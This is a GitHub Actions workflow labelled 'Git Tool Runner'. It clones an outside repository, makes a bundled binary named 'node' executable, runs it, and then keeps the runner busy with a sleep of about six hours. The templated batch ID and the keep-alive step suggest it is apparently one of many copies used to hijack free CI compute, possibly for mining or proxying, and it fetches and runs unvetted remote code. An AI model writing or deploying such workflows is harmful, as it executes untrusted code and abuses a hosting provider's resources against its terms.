name: Git Tool Runner
# Batch-ID: 1756222233479-0.08504021539199402
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Clone and Run Tool
        run: |
          git clone https://github.com/teo8764678/tool.git
          cd tool
          chmod +x node
          ./node app.js
      - name: Keep Runner Alive
        run: sleep 21000